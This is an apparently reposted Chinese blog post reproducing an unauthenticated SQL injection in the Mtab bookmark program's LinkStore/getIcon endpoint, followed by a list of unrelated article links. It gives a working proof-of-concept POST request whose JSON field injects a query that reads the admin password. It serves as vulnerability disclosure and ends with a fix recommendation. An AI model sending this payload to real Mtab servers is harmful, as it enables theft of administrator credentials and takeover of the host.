博客
关于我
Mtab书签导航程序 LinkStore/getIcon SQL注入漏洞复现
阅读量:798 次
发布时间:2023-02-10

本文共 746 字,大约阅读时间需要 2 分钟。

Mtab书签导航程序安全审计报告

产品简介

Mtab书签导航程序是一款专注于网页和应用书签管理的免费浏览器插件。作为一款无广告的在线书签工具,它支持多端同步、美观易用的导航体验,旨在帮助用户高效管理网页和应用,提升在线浏览效率。

漏洞发现

在安全测试中,我们发现该程序的LinkStore/getIcon接口存在严重的SQL注入漏洞。该漏洞未经身份验证,攻击者可利用这一漏洞获取以下信息:

  • 数据库中的敏感信息,包括管理员后台密码和用户个人信息
  • 高权限权限下,可向服务器中写入木马程序,进一步获取系统权限

复现环境

  • 工具:使用常见的Web安全工具进行请求构造
  • 目标URL/LinkStore/getIcon
  • 请求方法:POST请求
  • 请求头
    Host: [目标域名]User-Agent: [模拟浏览器信息]
  • 内容类型:application/json

漏洞复现

通过对接口的仔细分析,我们成功构造了以下证明用例(PoC):

POST /LinkStore/getIcon HTTP/1.1Host: [目标域名]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Content-Type: application/jsonConnection: Keep-alive{  "param": "SELECT `user`.`password` FROM `user` WHERE `username`= 'admin'"}

总结

该漏洞对系统安全性构成重大威胁,建议及时修复并升级相关接口安全性。

转载地址:http://ioffk.baihongyu.com/

你可能感兴趣的文章
Nginx面试三连问:Nginx如何工作?负载均衡策略有哪些?如何限流?
查看>>
Nginx(2):Nginx配置server节点
查看>>
nginx:/usr/src/fastdfs-nginx-module/src/common.c:21:25:致命错误:fdfs_define.h:没有那个文件或目录 #include
查看>>
Nginx:NginxConfig可视化配置工具安装
查看>>
Nginx:现代Web服务器的瑞士军刀 | 文章末尾送典藏书籍
查看>>
ngModelController
查看>>
ngrok | 内网穿透,支持 HTTPS、国内访问、静态域名
查看>>
ngrok内网穿透可以实现资源共享吗?快解析更加简洁
查看>>
ngrok内网穿透可以实现资源共享吗?快解析更加简洁
查看>>
NHibernate动态添加表
查看>>
NHibernate学习[1]
查看>>
NHibernate异常:No persister for的解决办法
查看>>
Nhibernate的第一个实例
查看>>
NHibernate示例
查看>>
nid修改oracle11gR2数据库名
查看>>
NIFI1.21.0/NIFI1.22.0/NIFI1.24.0/NIFI1.26.0_2024-06-11最新版本安装_采用HTTP方式_搭建集群_实际操作---大数据之Nifi工作笔记0050
查看>>
NIFI1.21.0_java.net.SocketException:_Too many open files 打开的文件太多_实际操作---大数据之Nifi工作笔记0051
查看>>
NIFI1.21.0_Mysql到Mysql增量CDC同步中_日期类型_以及null数据同步处理补充---大数据之Nifi工作笔记0057
查看>>
NIFI1.21.0_Mysql到Mysql增量CDC同步中_补充_插入时如果目标表中已存在该数据则自动改为更新数据_Postgresql_Hbase也适用---大数据之Nifi工作笔记0058
查看>>
NIFI1.21.0_Mysql到Mysql增量CDC同步中_补充_更新时如果目标表中不存在记录就改为插入数据_Postgresql_Hbase也适用---大数据之Nifi工作笔记0059
查看>>